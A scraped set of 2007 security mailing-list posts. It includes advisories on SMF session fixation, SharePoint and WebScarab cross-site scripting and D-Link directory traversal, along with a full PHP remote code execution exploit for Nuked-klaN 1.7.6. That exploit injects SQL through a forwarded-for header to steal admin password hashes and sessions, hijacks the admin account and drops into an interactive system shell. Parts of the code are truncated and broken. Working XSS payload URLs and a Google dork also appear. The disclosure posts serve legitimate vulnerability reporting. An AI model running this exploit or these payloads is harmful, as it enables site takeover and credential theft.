Re: NPDS <= 5.10 - Multiple SQL injections

[aeroxteam_PLEASEDONTSPAMUS]

Note: Php-nuke is maybe vulnerable to the same bug...

[MajorSecurity Advisory #47]Simple Machines Forum (SMF) - Session fixation Issue

[admin]

[MajorSecurity Advisory #47]Simple Machines Forum (SMF) - Session fixation Issue

Details
===
Product: Simple Machines Forum (SMF)
Affected version: 1.1.2 and prior
Remote-Exploit: yes
Vendor-URL: http://www.simplemachines.org
Vendor-Status: informed
Advisory-Status: published

Credits

Discovered by: David Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:

http://www.majorsecurity.de/index_2.php?major_rls=major_rls47

Introduction

"Simple Machines Forum — SMF in short — is a free, professional grade software 
package
that allows you to set up your own online community within minutes." -from 
simplemachines.org

More Details

1. Session fixation:
The "PHPSESSID" parameter can be set to a malicious and arbitrary value.

1.1 Description:
In a session fixation attack, the attacker fixes the user's session ID before 
the user even logs into the target server.
After a user's session ID has been fixed, the attacker will wait for them to 
login.
Once the user does so, the attacker uses the predefined session ID value to 
assume their online identity.

Workaround:

1. Do not accept session identifiers from GET / POST variables.

2.Regenerate SID on each request.

3. Accept only server generated SID:
One way to improve security is to not accept session identifiers not generated 
by server.

if ( ! isset( $_SESSION['SERVER_GENERATED_SID'] ) ) {
session_destroy(); // destroy all data in session
}
session_regenerate_id(); // generate a new session identifier
$_SESSION['SERVER_GENERATED_SID'] = true;


History/Timeline

30.04.2007 discovery of the vulnerability
03.04.2007 contacted the vendor
04.04.2007 working patch sent to the vendor
05.04.2007 advisory is written
05.04.2007 advisory released

MajorSecurity
===
MajorSecurity is a non-profit German penetration testing and security research 
project
which consists of only one person at the present time.
http://www.majorsecurity.de/

ACP3 (v4.0b3) - Multiple Vulnerabilities

[john]

ACP3 (v4.0b3) - Multiple Vulnerabilities

ACP3 (v4.0b3) - Multiple 
Vulnerabilitiesdiscovered by http://john-martinelli.com";>John MartinelliGoogle d0rk: http://www.google.com/search?q=%22Diese+Webseite+wird+angetrieben+von+ACP3";>"Diese
 Webseite wird angetrieben von ACP3"


http://www.example.com/path/news/list/index.php"; method="post">

Nuked-klaN 1.7.6 Remote Code Execution Exploit

[gmdarkfig]

# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class.
require("phpsploitclass.php"); # If you want to use this class, the latest
   # version can be downloaded from 
acid-root.new.fr.

$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # url
$prx = ''; # proxy :
$pra = ''; # basic authentification 

$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);

if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);

$config= array();
$config[]  = 'nuked'; # table prefix
$config[]  = 'nuked'; # cookie prefix
$config[]  = 'ORDER by date LIMIT 1'; # sql conditions
$config[]  = 'HAK';   # match, length <= 3
$config[]  = '';

$request   = array();
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users 
$config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users 
$config[2]),'$config[3]1'";
$request[] = "'$config[3]2',(SELECT id FROM $config[0]_users 
$config[2]),'$config[3]2'";
$request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE 
user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'";

for($i=0;$iaddheader("X-Forwarded-For",$sql);
$xpl->get($url);
$xpl->reset('header');
}

if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches))
  die("Exploit Failed");

$what = array("login","passwd","user_id","session");
for($i=0;$i ".$matches[2][$i];

if(empty($matches[2][3]))
  exit("\nNo session found");

# Logged in as admin
$name = array("admin_session","user_id","sess_id");
$xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]);

$phpc = array(
frmdt_url   => $url.'?file=User&op=update_pref',
'fichiernom' => array(frmdt_filename => '1.jpg',
frmdt_content => $config[4]));

$xpl->addheader('Referer',$url);
$xpl->formdata($phpc);
$xpl->get($url.'?file=User&op=edit_pref');

if(!preg_match('#\getcontent(),$match)) exit("\nNo file found");
else print "\n\$shell> ";

$sql   = array();
$sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) 
CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE 
name=".char('avatar_upload').";";*/
$sql[] = "UPDATE $config[0]_block SET 
type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;";
$sql[] = "DELETE FROM $config[0]_nbconnecte;";

for($i=0;$ipost($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]);

while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)
{
# 0'); include('./conf.inc.php'); print $global['db_pass']; //
$xpl->reset('header');
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($url);
$data = explode('123456789',$xpl->getcontent());
print $data[1]."\n\$shell> ";
}

function char($data)
{
$char='CHAR(';
for($i=0;$i

RE: XSS in Microsoft SharePoint

[Jim Harrison]

Tried and failed.
Exactly how have you configured your test SP site?

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
Sent: Friday, May 04, 2007 3:01 PM
To: bugtraq@securityfocus.com
Subject: XSS in Microsoft SharePoint

Hi!
I think this is a XSS in MS SharePoint, you can reproduce it in
SharePoint test server using for example following url:

http://www.example.com/sharepoint/default.aspx/%22);}if(true){alert(%22q
wertytis

This is due a lack of string stripping when putting the path into
javascript.
 
It seems to work at least on every main page.
 
I tried to check for this in the web, but I didn't found this hole
anywhere.
 
-- 
Regards,
Solarius - http://www.solarius.name

All mail to and from this domain is GFI-scanned.

Re: WebScarab <= 20060621-0003 cross site scripting

[Rogan Dawes]

[EMAIL PROTECTED] wrote (a LONG time ago):

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



SA0012

+
+  WebScarab Cross Site Scripting   +
+


PUBLISHED ON
  Jul 18, 2006


PUBLISHED AT
  http://moritz-naumann.com/adv/0012/webscarabxss/0012.txt
  http://moritz-naumann.com/adv/0012/webscarabxss/0012.txt.gpg


PUBLISHED BY
  Moritz Naumann IT Consulting & Services
  Hamburg, Germany
  http://moritz-naumann.com/

  SECURITY at MORITZ hyphon NAUMANN d0t COM
  GPG key: http://moritz-naumann.com/keys/0x277F060C.asc


AFFECTED APPLICATION OR SERVICE
  WebScarab
  http://www.owasp.org/index.php/OWASP_WebScarab_Project
  http://sourceforge.net/projects/owasp/

  WebScarab is a Free Software for manual and semi-automatic
  web application penetration testing. It is developed in
  Java by Rogan Dawes as part of the Open Web Application
  Security Project (OWASP).


AFFECTED VERSIONS
  Version 20060621-0003 and below


ISSUES
  WebScarab is subject to a client side script code injection
  vulnerability which may allows for running cross site
  scripting attacks against web clients connecting through it.

  + 1. Cross Site Scripting vulnerability in error
   messages

  By accessing the following URI using a web browser which is
  prone to this issue and configured to proxy through a
  vulnerable version of WebScarab, a non-persitent web script
  injection can be achieved:

  http://arbitrary.domain/alert(0);

  This allows for disclosure of sensitive data stored in the
  security context of any arbitrary domain which the web browser
  has previously accessed but WebScarab is not able to access
  by the time the attack takes place (due to invalid upstream
  proxy setting on WebScarab, different results of DNS queries,
  limited connectivity or other reasons).

  Ms Internet Explorer 6 SP2 and Konqueror 3.5.3 are known to
  be prone to this issue. This problem is caused by insufficient
  santitation of user supplied input before it is returned to
  the client as part of an error message.


BACKGROUND
  Cross Site Scripting (XSS):
  Cross Site Scripting, also known as XSS or CSS, describes
  the injection of malicious content into output produced
  by a web application. A common attack vector is the
  inclusion of arbitrary client side script code into the
  applications' output. Failure to completely sanitize user
  input from malicious content can cause a web application
  to be vulnerable to Cross Site Scripting.

  http://en.wikipedia.org/wiki/XSS
  http://www.cgisecurity.net/articles/xss-faq.shtml


WORKAROUNDS
  Client: Disable Javascript.
  Server: None known.


SOLUTIONS
  Rogan Dawes has released version 20060718-1904 today.
  This version fixes this issue. The updated packages is
  available at

http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61823


TIMELINE
  Jul 18, 2006: Discovery, code maintainer notification
  Jul 18, 2006: Code maintainer provides fix
  Jul 18, 2006: Public advisory


REFERENCES
  N/A


ADDITIONAL CREDIT
  N/A


LICENSE
  Creative Commons Attribution-ShareAlike License Germany
  http://creativecommons.org/licenses/by-sa/2.0/de/


Due to a complete lack of actual testing, the abovementioned "fix" for 
this problem didn't actually do anything. Thanks to Nathaniel Roberts 
for pointing this out, even almost a year later.


A new release of WebScarab has been published that does actually fix 
this. It can be obtained from 



The full changelog since the previous version is available at 



Regards,

Rogan Dawes

XSS in Microsoft SharePoint

[ville . solarius]

Hi!
I think this is a XSS in MS SharePoint, you can reproduce it in SharePoint test 
server using for example following url:

http://www.example.com/sharepoint/default.aspx/%22);}if(true){alert(%22qwertytis

This is due a lack of string stripping when putting the path into javascript.
 
It seems to work at least on every main page.
 
I tried to check for this in the web, but I didn't found this hole anywhere.
 
-- 
Regards,
Solarius - http://www.solarius.name

Re: sunshop v4 >> RFI

[lagged2hell]

Those file references you are pasting are NOT from v4 in fact v4 isnt even 
vulnerable. Only 3.5 and earlier.

Re: Medium security hole affecting DSL-G624T

[Tim Brown]

On Thursday 03 May 2007 22:13:15 3APA3A wrote:

> This  vulnerability  for  D-Link  DSL-G624T was already reported by Jose
> Ramon Palanco. See
>
> http://securityvulns.ru/Odocument816.html
>
> Previously, same problem was reported for D-Link DSL-G604T by Qex
>
> http://securityvulns.ru/Mdocument578.html
>
>
> There were also few more problems reported about /cgi-bin/webcm, see
>
> http://securityvulns.ru/Idocument664.html
> http://securityvulns.ru/Idocument759.html

I quite agree, the Summary of my attached advisory makes this point.  However, 
as I also point out in the Solutions section, all of the issues you list were 
against major version 1 of the firmware.  We're now at major version 3 and 
directory traversal is still a problem.  Moreover, the advisories that cover 
directory traversal (http://securityvulns.ru/Mdocument578.html and 
http://securityvulns.ru/Mdocument578.html) only talk about /etc/passwd.  
Neglecting the fact that the web server runs as root and that /etc/shadow is 
therefore available.

Secondly, the Javascript injection issue describe is as far as I 
know /entirely new/.  It's not a short walk to the point where these two 
issues alone could be use to compromise devices, irrespective of the firmware 
issues you also link to.

Maybe, I'm hoping that by version 10 of the firmware in the year 2014, D-Link 
may actually manage to fix some of these reported problems?  Moreover, maybe 
they'll actually make it possible for researchers to report these things in a 
manner whereby they actually respond to the reports when contacted.  Not 
holding my breath though.

Tim
-- 
Tim Brown